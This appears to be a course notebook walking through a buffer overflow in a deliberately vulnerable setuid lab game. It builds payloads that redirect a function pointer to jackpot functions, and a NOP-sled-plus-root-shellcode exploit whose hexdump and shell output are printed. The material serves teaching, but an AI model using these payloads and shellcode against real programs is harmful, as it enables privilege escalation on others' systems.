"### Find the vulnerability in the game\n- do code review to find global **player** object and `change_username()`\n- note **user** struct has declared name buffer of 100 bytes\n- change_username() function uses `mgest()` function to read and store data into name field one character at a time until '\\n'\n- there's nothing to limit it to the length of the destination buffer!\n- so, the game has buffer overrun/overflow vulnerability!\n\n### Exploit the overflow vulnerability\n- run the program\n- explore the memory addresses of **name** and **current_game** using peda/gdb\n- use gdb to debug the live process\n- find the process id of lucky7.exe process\n\n```bash\n┌──(kali㉿K)-[~]\n└─$ ps aux | grep lucky7.exe \nroot 30439 0.1 0.0 5476 1344 pts/2 S+ 10:54 0:00 ./lucky7.exe\nkali 30801 0.0 0.0 6320 724 pts/3 S+ 10:59 0:00 grep --color=auto lucky7.exe\n\n\n- use the process_id to debug in gdb\n\n┌──(kali㉿K)-[~/EthicalHacking/demos/other_overflow]\n└─$ sudo gdb -q --pid=59004 --symbols=./lucky7.exe\n\n(gdb) p/x &player.name\n$1 = 0x8050148\n\n(gdb) p/x &player.current_game\n$2 = 0x80501ac\n\n(gdb) p/u 0x80501ac - 0x8050148 # (address of player.current_game) - (address of player.name)\n$3 = 100\n```\n\n- notice, **name[100]** is at a lower address\n- **(\\*current_game)()** is at a higher address find the exact size that would overlfow the current_game\n- the offset should be at least 100 bytes\n\n### Let's overwrite the current_game's value with our controlled address\n\n- create a string with 100As + BBBB\n- detach the process from gdb and change the name with menu option 5 pasting the following buffer\n- Enter 1 to play the game and the buffer should overwrite the [DEBUG] current_game pointer with 0x42424242",
"_____no_output_____"
]
],
[
[
"# change the name to the following string\n! python -c 'print(\"A\"*100 + \"B\"*4)'",
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\r\n"
]
],
[
[
"- run the program and play the last game after changing name\n\n```bash\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ ./lucky7.exe \nDatabase file doesn't exist: /var/lucky7.txt\n-=-={ New Player Registration }=-=-\nEnter your name: John Smith\n\nWelcome to the Lucky 7 Game John Smith.\nYou have been given 500 credits.\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith]\n[You have 500 credits] -> Enter your choice [1-7]: 1\n\n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b141\nthe random number is: 8 \nSorry! Better luck next time...\n\nYou have 490 credits\nWould you like to play again? [y/n]: n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith]\n[You have 490 credits] -> Enter your choice [1-7]: 5\n\nChange user name\nEnter your new name:\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]\n[You have 490 credits] -> Enter your choice [1-7]: 1\n\n[DEBUG] current_game pointer 0x42424242\nzsh: segmentation fault ./lucky7.exe\n```",
"_____no_output_____"
],
[
"### Find useful functions/code in the program to execute\n- **nm** command lists symbols in object files with corresponding addresses\n - can be used to find addresses of various functions in a program\n- `jackpot()` functions are intruiging!\n\n```bash\n┌──(kali㉿K)-[~/EthicalHacking/demos/other_overflow]\n└─$ nm ./lucky7.exe \n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ nm ./lucky7.exe 139 ⨯\n08050114 B __bss_start\n08050120 b completed.0\n U __cxa_atexit@GLIBC_2.1.3\n08050104 D DATAFILE\n080500f8 D __data_start\n080500f8 W data_start\n0804a440 t deregister_tm_clones\n0804a420 T _dl_relocate_static_pie\n0804a4c0 t __do_global_dtors_aux\n0804fee4 d __do_global_dtors_aux_fini_array_entry\n080500fc D __dso_handle\n08050100 V DW.ref.__gxx_personality_v0\n0804fee8 d _DYNAMIC\n08050114 D _edata\n080501b4 B _end\n U exit@GLIBC_2.0\n0804c3d8 T _fini\n0804d000 R _fp_hw\n0804a4f0 t frame_dummy\n0804fed8 d __frame_dummy_init_array_entry\n0804e438 r __FRAME_END__\n U getchar@GLIBC_2.0\n U getuid@GLIBC_2.0\n08050000 d _GLOBAL_OFFSET_TABLE_\n0804c34a t _GLOBAL__sub_I_DATAFILE\n0804b5a0 t _GLOBAL__sub_I__Z10get_choiceR4User\n w __gmon_start__\n0804d7e4 r __GNU_EH_FRAME_HDR\n U __gxx_personality_v0@CXXABI_1.3\n0804a000 T _init\n0804fee4 d __init_array_end\n0804fed8 d __init_array_start\n0804d004 R _IO_stdin_used\n0804c3d0 T __libc_csu_fini\n0804c370 T __libc_csu_init\n U __libc_start_main@GLIBC_2.0\n0804bcda T main\n08050140 B player\n U printf@GLIBC_2.0\n U puts@GLIBC_2.0\n U rand@GLIBC_2.0\n0804a480 t register_tm_clones\n U sleep@GLIBC_2.0\n U srand@GLIBC_2.0\n0804a3e0 T _start\n U strcpy@GLIBC_2.0\n U strlen@GLIBC_2.0\n U time@GLIBC_2.0\n08050114 D __TMC_END__\n U _Unwind_Resume@GCC_3.0\n0804bcd2 T __x86.get_pc_thunk.ax\n0804c3d1 T __x86.get_pc_thunk.bp\n0804a430 T __x86.get_pc_thunk.bx\n0804bcd6 T __x86.get_pc_thunk.si\n0804a4f2 T _Z10get_choiceR4User\n0804bfeb T _Z10jackpot10Kv !!!!!!!!!<- JACKPOT ---> !!!!!!!!!!\n0804b2b8 T _Z10lucky77777v\n0804c038 T _Z11jackpot100Kv\n0804b042 T _Z11printNumberi\n0804b3fb T _Z12reset_creditPcR4User\n0804aeeb T _Z12show_creditsRK4User\n0804c181 T _Z13play_the_gamev\n0804c0d2 T _Z14deduct_creditsv\n0804c29c T _Z15change_usernamev\n0804ac37 T _Z16read_player_dataPcR4User\n0804b429 T _Z17get_random_numberi\n0804a97f T _Z18update_player_dataPcR4User\n0804a6c0 T _Z19register_new_playerPcR4User\n0804b547 t _Z41__static_initialization_and_destruction_0ii\n0804c2f1 t _Z41__static_initialization_and_destruction_0ii\n0804ae82 T _Z5mgetsPc\n0804b141 T _Z6lucky7v\n0804b46d T _Z6rstripRNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE\n0804b1cd T _Z8lucky777v\n0804c085 T _Z9jackpot1Mv\n0804b7fc W _ZN9__gnu_cxx11char_traitsIcE2eqERKcS3_\n0804b81c W _ZN9__gnu_cxx11char_traitsIcE6lengthEPKc\n...\n\n```",
"_____no_output_____"
],
[
"### Script the interactive user input\n- instead of typing options and commands interactively, they can be scripted and piped into the program\n- program can then parse and use the input as if someone is interactively typing it from the std input stream\n- make sure the game has been played atleast once by the current user\n - the following script needs to start with full name otherwise!",
"_____no_output_____"
]
],
[
[
"# play game #1, y, n; \n# Enter 7 to quit\n! python -c 'print(\"1\\ny\\nn\\n7\")'",
"1\r\ny\r\nn\r\n7\r\n"
],
[
"%pwd",
"_____no_output_____"
],
[
"! python -c 'print(\"1\\ny\\nn\\n7\")' | ./lucky7.exe",
"-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]\n[You have 99320 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b0c1\nthe random number is: 2 \nSorry! Better luck next time...\n\nYou have 99310 credits\nWould you like to play again? [y/n]: \n[DEBUG] current_game pointer 0x0804b0c1\nthe random number is: 1 \nSorry! Better luck next time...\n\nYou have 99300 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 99300 credits] -> Enter your choice [1-7]: \nThanks for playing! Good Bye.\n"
],
[
"# let's replace the current_game with out own data (BBBB)\n! python -c 'print(\"1\\nn\\n5\\n\" + \"A\"*100 + \"BBBB\\n\" + \"1\\nn\\n7\")' | ./lucky7.exe",
"-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]\n[You have 109290 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b0c1\nthe random number is: 6 \nSorry! Better luck next time...\n\nYou have 109280 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 109280 credits] -> Enter your choice [1-7]: \nChange user name\nEnter your new name:\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]\n[You have 109280 credits] -> Enter your choice [1-7]: \n[DEBUG] current_game pointer 0x42424242\n"
],
[
"# note the jackpot()'s address\n! nm ./lucky7.exe | grep jackpot",
"0804bf6b T _Z10jackpot10Kv\r\n0804bfb8 T _Z11jackpot100Kv\r\n0804c005 T _Z9jackpot1Mv\r\n"
],
[
"# let's create a string mimicking game play with jackpot100K address!\n! python -c 'import sys; sys.stdout.buffer.write(b\"1\\nn\\n5\\n\" + b\"A\"*100 + b\"\\xb8\\xbf\\x04\\x08\\n\" + b\"1\\nn\\n7\\n\")'\n# the following is the sequnce of user input to play the game",
"1\r\nn\r\n5\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��\u0004\b\r\n1\r\nn\r\n7\r\n"
],
[
"# now let's hit the Jackpot to receive 100K credit!\n! python -c 'import sys; sys.stdout.buffer.write(b\"1\\nn\\n5\\n\" + b\"A\"*100 + b\"\\xb8\\xbf\\x04\\x08\\n\" + b\"1\\nn\\n7\\n\")' | ./lucky7.exe",
"-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]\n[You have 109280 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b0c1\nthe random number is: 5 \nSorry! Better luck next time...\n\nYou have 109270 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 109270 credits] -> Enter your choice [1-7]: \nChange user name\nEnter your new name:\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 109270 credits] -> Enter your choice [1-7]: \n[DEBUG] current_game pointer 0x0804bfb8\n*+*+*+*+*+* JACKPOT 100 THOSAND *+*+*+*+*+*\nCongratulations!!!!\n You have won the jackpot of 100000 (100K) credits!\nSorry! Better luck next time...\n\nYou have 209270 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 209270 credits] -> Enter your choice [1-7]: \nThanks for playing! Good Bye.\n"
],
[
"# let's hit the Jackpot 2 times in a row!\n# and change to your actual name\n# now let's hit the Jackpot!\n! python -c 'import sys; sys.stdout.buffer.write(b\"1\\nn\\n5\\n\" + b\"A\"*100 + b\"\\xb8\\xbf\\x04\\x08\\n\" + b\"1\\ny\\nn\\n5\\nJohn Smith\\n2\\nn\\n7\\n\")' | ./lucky7.exe",
"-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith ]\n[You have 609200 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b0c1\nthe random number is: 9 \nSorry! Better luck next time...\n\nYou have 609190 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith ��]\n[You have 609190 credits] -> Enter your choice [1-7]: \nChange user name\nEnter your new name:\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 609190 credits] -> Enter your choice [1-7]: \n[DEBUG] current_game pointer 0x0804bfb8\n*+*+*+*+*+* JACKPOT 100 THOSAND *+*+*+*+*+*\nCongratulations!!!!\n You have won the jackpot of 100000 (100K) credits!\nSorry! Better luck next time...\n\nYou have 709190 credits\nWould you like to play again? [y/n]: \n[DEBUG] current_game pointer 0x0804bfb8\n*+*+*+*+*+* JACKPOT 100 THOSAND *+*+*+*+*+*\nCongratulations!!!!\n You have won the jackpot of 100000 (100K) credits!\nSorry! Better luck next time...\n\nYou have 809190 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��]\n[You have 809190 credits] -> Enter your choice [1-7]: \nChange user name\nEnter your new name:\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith]\n[You have 809190 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 777 ~*~*~\nCosts 50 credits to play this game.\nMachine will generate 3 random numbers each between 1 and 9.\nIf all 3 numbers are 7, you win a jackpot of 100 THOUSAND\nIf all 3 numbers match, you win 10 THOUSAND\nOtherwise, you lose.\n Enter to continue...\n\n[DEBUG] current_game pointer 0x0804b14d\n3 random numers are: 3 4 4 \nSorry! Better luck next time...\n\nYou have 809140 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith]\n[You have 809140 credits] -> Enter your choice [1-7]: \nThanks for playing! Good Bye.\n"
]
],
[
[
"## Exploiting with shellcode\n\n### Stashing Shellcode as Environment Varaible\n- compile `getenvaddr.cpp` file as 32-bit binary",
"_____no_output_____"
]
],
[
[
"! g++ -m32 -o getenvaddr.exe getenvaddr.cpp",
"_____no_output_____"
]
],
[
[
"- export `/shellcode/shellcode_root.bin` as an env variable\n\n```bash\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ export SHELLCODE=$(cat ../../shellcode/shellcode_root.bin)\n\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ ./getenvaddr.exe SHELLCODE ./lucky7.exe \nSHELLCODE will be at 0xffffdf80 with reference to ./lucky7.exe\n\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ python -c 'import sys; sys.stdout.buffer.write(b\"1\\nn\\n5\\n\" + b\"A\"*100 + b\"\\x80\\xdf\\xff\\xff\\n\" + b\"1\\n\")' > env_exploit\n\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ cat env_exploit - | ./lucky7.exe \n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]\n[You have 858770 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b0bf\nthe random number is: 4 \nSorry! Better luck next time...\n\nYou have 858760 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�]\n[You have 858760 credits] -> Enter your choice [1-7]: \nChange user name\nEnter your new name:\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����]\n[You have 858760 credits] -> Enter your choice [1-7]: \n[DEBUG] current_game pointer 0xffffdf80\nwhoami\nroot\nexit\n\n```\n\n- congratulations on getting your shellcode executed!!",
"_____no_output_____"
],
[
"### Smuggling Shellcode into Program's Buffer\n### Note: not working!!!\n\n- as the program is setuid; it \"should\" give you a root shell if you can manage to smuggle and execute root shellcode!\n- goal is to overwrite `player.name` with shellcode\n- overflow the `player.current_game` attribute with the address of the smuggled shellcode\n - NOTE: we're not overflowing the return address, though you could!\n- find the address of `player.name` attribute using gdb\n- run `lucky7.exe` game from a terminal\n- from another terminal finds its pid\n\n```bash\n# Terminal 1\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ ./lucky7.exe \n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith ]\n[You have 809140 credits] -> Enter your choice [1-7]: \n\n#Terminal 2\n\n┌──(kali㉿K)-[~]\n└─$ ps aux | grep lucky7.exe\nroot 2639 0.0 0.0 5476 1264 pts/2 S+ 15:01 0:00 ./lucky7.exe\nkali 2932 0.0 0.0 6320 660 pts/3 S+ 15:01 0:00 grep --color=auto lucky7.exe\n\n\n┌──(kali㉿K)-[~]\n└─$ sudo gdb -q --pid=2639\n[sudo] password for kali: \nAttaching to process 2639\nReading symbols from /home/kali/projects/EthicalHacking/demos/other_overflow/lucky7.exe...\nReading symbols from /lib32/libstdc++.so.6...\n(No debugging symbols found in /lib32/libstdc++.so.6)\nReading symbols from /lib32/libgcc_s.so.1...\n(No debugging symbols found in /lib32/libgcc_s.so.1)\nReading symbols from /lib32/libc.so.6...\n(No debugging symbols found in /lib32/libc.so.6)\nReading symbols from /lib32/libm.so.6...\n(No debugging symbols found in /lib32/libm.so.6)\nReading symbols from /lib/ld-linux.so.2...\n(No debugging symbols found in /lib/ld-linux.so.2)\n0xf7fcb559 in __kernel_vsyscall ()\nwarning: File \"/home/kali/.gdbinit\" auto-loading has been declined by your `auto-load safe-path' set to \"$debugdir:$datadir/auto-load\".\nTo enable execution of this file add\n add-auto-load-safe-path /home/kali/.gdbinit\nline to your configuration file \"/root/.gdbinit\".\nTo completely disable this security protection add\n set auto-load safe-path /\nline to your configuration file \"/root/.gdbinit\".\nFor more information about this security protection see the\n\"Auto-loading safe path\" section in the GDB manual. E.g., run from the shell:\n info \"(gdb)Auto-loading safe path\"\n(gdb) p/x &player.name\n$1 = 0x8050128\n(gdb) p/x &player.current_game\n$2 = 0x805018c\n(gdb) p/u 0x805018c - 0x8050128\n$3 = 100\n(gdb)\n(gdb) quit\n\n\n```\n- so the address of `player.name` is 0x8050128\n- the offset to overwrite `player.current_game` from `player.name` is 100!\n- exploit code should look like this: [NOP sled | shellcode | SHELLCODE_ADDRESS]\n- NOP sled + shellcode should be 100 bytes long\n- let's find the length of the root shellcode in `shellcode` folder\n",
"_____no_output_____"
]
],
[
[
"%pwd",
"_____no_output_____"
],
[
"%cd ./demos/other_overflow",
"/home/kali/projects/EthicalHacking/demos/other_overflow\n"
],
[
"! wc -c ../../shellcode/shellcode_root.bin",
"35 ../../shellcode/shellcode_root.bin\r\n"
],
[
"# total NOP sled\n100 - 35",
"_____no_output_____"
],
[
"# let's write NOP sled to a binary file\n! python -c 'import sys; sys.stdout.buffer.write(b\"\\x90\"*65)' > ./lucky7_exploit.bin",
"_____no_output_____"
],
[
"! wc -c ./lucky7_exploit.bin",
"65 ./lucky7_exploit.bin\r\n"
],
[
"# lets append shellcode to the exploitcode\n! cat ../../shellcode/shellcode_root.bin >> ./lucky7_exploit.bin",
"_____no_output_____"
],
[
"# let's check the size of exploit code\n! wc -c ./lucky7_exploit.bin",
"100 ./lucky7_exploit.bin\r\n"
],
[
"print(hex(0x08050128 + 25))",
"0x8050141\n"
],
[
"# let's append the address of player.name: 0x8050128\n! python -c 'import sys; sys.stdout.buffer.write(b\"\\x41\\x01\\x05\\x08\\n\")' >> ./lucky7_exploit.bin",
"_____no_output_____"
],
[
"! hexdump -C ./lucky7_exploit.bin",
"00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|\r\n*\r\n00000040 90 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 |.1.1.1......j.XQ|\r\n00000050 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 |h//shh/bin..Q..S|\r\n00000060 89 e1 cd 80 41 01 05 08 0a |....A....|\r\n00000069\r\n"
],
[
"# let's check the size of exploit code\n! wc -c ./lucky7_exploit.bin",
"105 ./lucky7_exploit.bin\r\n"
],
[
"! python -c 'import sys; sys.stdout.buffer.write(b\"1\\nn\\n5\\n\")' > lucky7_final_exploit.bin",
"_____no_output_____"
],
[
"! hexdump -C lucky7_final_exploit.bin",
"00000000 31 0a 6e 0a 35 0a |1.n.5.|\r\n00000006\r\n"
],
[
"! cat lucky7_exploit.bin >> lucky7_final_exploit.bin",
"_____no_output_____"
],
[
"! python -c 'import sys; sys.stdout.buffer.write(b\"1\\n\")' >> lucky7_final_exploit.bin",
"_____no_output_____"
],
[
"! wc -c ./exploit_game.bin",
"116 ./exploit_game.bin\r\n"
],
[
"! hexdump -C ./lucky7_final_exploit.bin",
"00000000 31 0a 6e 0a 35 0a 90 90 90 90 90 90 90 90 90 90 |1.n.5...........|\r\n00000010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|\r\n*\r\n00000040 90 90 90 90 90 90 90 31 c0 31 db 31 c9 99 b0 a4 |.......1.1.1....|\r\n00000050 cd 80 6a 0b 58 51 68 2f 2f 73 68 68 2f 62 69 6e |..j.XQh//shh/bin|\r\n00000060 89 e3 51 89 e2 53 89 e1 cd 80 41 01 05 08 0a 31 |..Q..S....A....1|\r\n00000070 0a |.|\r\n00000071\r\n"
]
],
[
[
"- exploit the program with the final exploit created\n\n``` \n$ cat lucky7_final_exploit.bin - | ./lucky7.exe\n```\n\n- NOTICE: the hyphen after the exploit\n- tells the cat program to send standard input after the exploit buffer, returning control of the input\n- eventhough the shell doesn't display its prompt, it is still accessible\n- stash both and user and root shell and force the program execute them\n\n```bash\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ cat lucky7_final_exploit.bin - | ./lucky7.exe \n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: ��������������������������������������������������������1����$h/zsh/binh/usr ]\n[You have 918420 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b0bf\nthe random number is: 7 \n*+*+*+*+*+* JACKPOT 10 THOUSAND *+*+*+*+*+*\nCongratulations!\n You have won the jackpot of 10000 (10K) credits!\n\nYou have 928410 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: ��������������������������������������������������������1����$h/zsh/binh/usr �]\n[You have 928410 credits] -> 